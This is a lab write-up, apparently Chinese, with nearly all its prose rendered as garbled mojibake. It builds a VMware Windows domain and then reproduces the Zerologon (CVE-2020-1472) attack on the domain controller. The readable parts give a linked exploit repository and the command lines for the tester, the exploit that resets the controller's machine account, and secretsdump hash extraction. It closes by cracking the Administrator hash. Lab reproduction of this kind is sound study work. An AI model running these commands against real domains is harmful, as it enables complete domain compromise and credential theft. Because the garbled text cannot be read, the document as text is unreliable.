ϵͳ»·¾³
1.windows server 2012 r2£¨Óò¿ØÖÆÆ÷£©
2.windows server 2008 r2£¨ÓòÄÚ·þÎñÆ÷£©
3.windows 7£¨ÓòÄÚÆÕͨÖ÷»ú£©
2
´î½¨Óò»·¾³
1¡¢ÍøÂç»·¾³ÅäÖÃ
ÔÚVMwareÖа²×°ºÃwin7¡¢win2008ºÍwin2012£¬È»ºóµÚÒ»²½ÊǽøÐÐÍøÂçÅäÖã¬ÓÉÓÚÊÇÒª´î½¨Óò»·¾³£¬ËùÒÔÓò¿ØÖÆÆ÷ÐèҪʹÓù̶¨µÄ¾²Ì¬ip£¬ÔÚÕâÀïÓòÄÚµÄÈý̨»úÆ÷ΪÁË·½±ã¶¼ÉèÖÃΪ¹Ì¶¨ip¡£
½«Èý̨»úÆ÷µÄÍø¿¨¶¼ÉèÖÃΪNAT£¬½øÈëÐéÄâÍøÂç±à¼Æ÷£¬½«DHCPµÄÑ¡ÖÐÈ¥µô¡£È»ºóµã»÷NATÉèÖã¬ÉèÖÃÍø¹Ø¡£´Ë´¦ÉèÖãº
꿦룼192.168.154.0
Íø¹Ø£º192.168.154.1
×ÓÍøÑÚÂ룺255.255.255.0

Óò¿ØÖ÷»ú£¨192.168.154.30£©ÍøÂçÉèÖãº
ip£º192.168.154.30
×ÓÍøÑÚÂ룺255.255.255.0
Íø¹Ø£º192.168.154.1
DNS£º192.168.154.30
Win2008£¨192.168.154.20£©ÍøÂçÉèÖãº
ip£º192.168.154.20
×ÓÍøÑÚÂ룺255.255.255.0
Íø¹Ø£º192.168.154.1
DNS£º192.168.154.30

Win7£¨192.168.154.10£©ÍøÂçÉèÖãº
ip£º192.168.154.10
×ÓÍøÑÚÂ룺255.255.255.0
Íø¹Ø£º192.168.154.1
DNS£º192.168.154.30

2¡¢Óò¿Ø¼°DNS·þÎñÆ÷£¨192.168.154.30£©°²×°
´ò¿ª·þÎñÆ÷¹ÜÀíÆ÷£¬µã»÷Ìí¼Ó½ÇÉ«ºÍ¹¦ÄÜ

¹´Ñ¡ADÓò·þÎñºÍDNS·þÎñÆ÷
Ò»Ö±ÏÂÒ»²½£¬µã»÷°²×°

°²×°Íê³Éºó£¬ÐèÒª½«·þÎñÆ÷ÌáÉýΪÓò¿ØÖÆÆ÷
Ìí¼ÓÒ»¸öÐÂÁÖ£¬¸ùÓòÃûΪdomore.me
ÊäÈëĿ¼»¹ÔÃÜÂ룬ÏÂÒ»²½
Ò»Ö±ÏÂÒ»²½£¬µã»÷°²×°£¬µÈ´ý°²×°Íê³É×Ô¶¯ÖØÆô£¨Èç¹û°²×°³öÏÖ´íÎ󣬿ÉÔÚDNSÑ¡ÏîÈ¥µôDNSίÅɵĹ´Ñ¡£©
3¡¢Ö÷»úÈëÓò
µÈ´ýÓò¿ØÖÆÆ÷°²×°ÖØÆôÍê³Éºó£¬ÔÚ192.168.154.10ºÍ192.168.154.20Á½Ì¨Ö÷»úÉÏʹÓÃpingÃüÁîºÍnslookupÃüÁî²é¿´ÊÇ·ñÄÜÁ¬Í¨domore.meÓò¡£
Á¬Í¨Ã»ÓÐÎÊÌâºó£¬ÔÚ¿ØÖÆÃæ°å->ϵͳºÍ»Æ½ð³Ç¹ÙÍø->ϵͳ->¸ü¸ÄÉèÖÃÖÐÉèÖÃÖ÷»úµÄÓòΪdomore.me
³É¹¦ÈëÓò
4¡¢´´½¨ÓòÕË»§
µÇ¼Óò¿ØÖÆÆ÷£¬´´½¨Ò»¸öÓòÓû§
ÉèÖÃÒ»¸öÇ¿ÃÜÂë1QAZ2wsx@?!
ʹÓÃÓòÕË»§µÇ¼Ö÷»ú192.168.154.10
ÖÁ´Ë£¬Ò»¸ö¼òµ¥µÄÓò»·¾³´î½¨Íê³É¡£
3
Netlogon©¶´¸´ÏÖ
1¡¢Â©¶´¼ò½é
NetlogonÐÒéÊÇ΢ÈíÌṩµÄÒ»Ì×Óò·ÃÎÊÈÏÖ¤ÐÒé¡£CVE-2020-1472ÊÇÒ»¸öwindowsÓò¿ØÖÐÑÏÖØµÄÔ¶³ÌȨÏÞÌáÉý©¶´£¬ÓÉÓÚ΢ÈíÔÚNetlogonÐÒéÖÐûÓÐÕýȷʹÓüÓÃÜËã·¨¶øµ¼ÖµÄ©¶´£¬Î¢ÈíÔÚ½øÐÐAES¼ÓÃÜÔËËã¹ý³ÌÖУ¬Ê¹ÓÃÁËAES-CFB8ģʽ²¢ÇÒ´íÎóµÄ½«IVÉèÖÃΪȫÁ㣬ÕâʹµÃ¹¥»÷ÕßÔÚÃ÷ÎÄ(client challenge)¡¢IVµÈÒªËØ¿É¿ØµÄÇé¿öÏ£¬´æÔڽϸ߸ÅÂÊʹµÃ²úÉúµÄÃÜÎÄΪȫÁã¡£
2¡¢Â©¶´¸´ÏÖ
Ê×ÏȲ鿴Óò¿ØÖÆÆ÷£¬Netlogon·þÎñÕýÔÚÔËÐÐ
±à¼kaliµÄÍøÂçÁ¬½Ó£¬Ê¹ÆäÄÜÁ¬Í¨Óò¿ØÖÆÆ÷
Poc¼°EXPÁ´½Ó£ºhttps://github.com/De4dCr0w/Vulnerability-analyze/tree/master/Zerologon-CVE-2020-1472
PS£ºÕâÀï×¢ÒâÏÈpip3 install -r requirements.txt£¬pip3 install impacketÒ»ÏÂ
ÔËÐÐpoc¼ì²â½Å±¾
python3 zerologon_tester.py WIN-SHSMTK6HJCK 192.168.154.30£¬WIN-SHSMTK6HJCKΪÓò¿ØÖ÷»úÃû£¬192.168.154.30ΪÓò¿ØipµØÖ·
Ö´ÐÐexp֮ǰÔËÐÐÒ»´Î»ñÈ¡hashµÄ½Å±¾
python3 secretsdump.py domore.me/WIN-SHSMTK6HJCK$@192.168.154.30 -just-dc -hashes :£¬·¢ÏÖ»ñȡʧ°Ü
ÐÐexp£ºpython3 CVE-2020-1472.py WIN-SHSMTK6HJCK WIN-SHSMTK6HJCK$ 192.168.154.30
ÔÙ´ÎÖ´ÐлñÈ¡hash½Å±¾£¬³É¹¦¡£
½âÒ»ÏÂÓò¿ØAdministratorÕË»§µÄhash£¬Win2012@test£¬³É¹¦¡£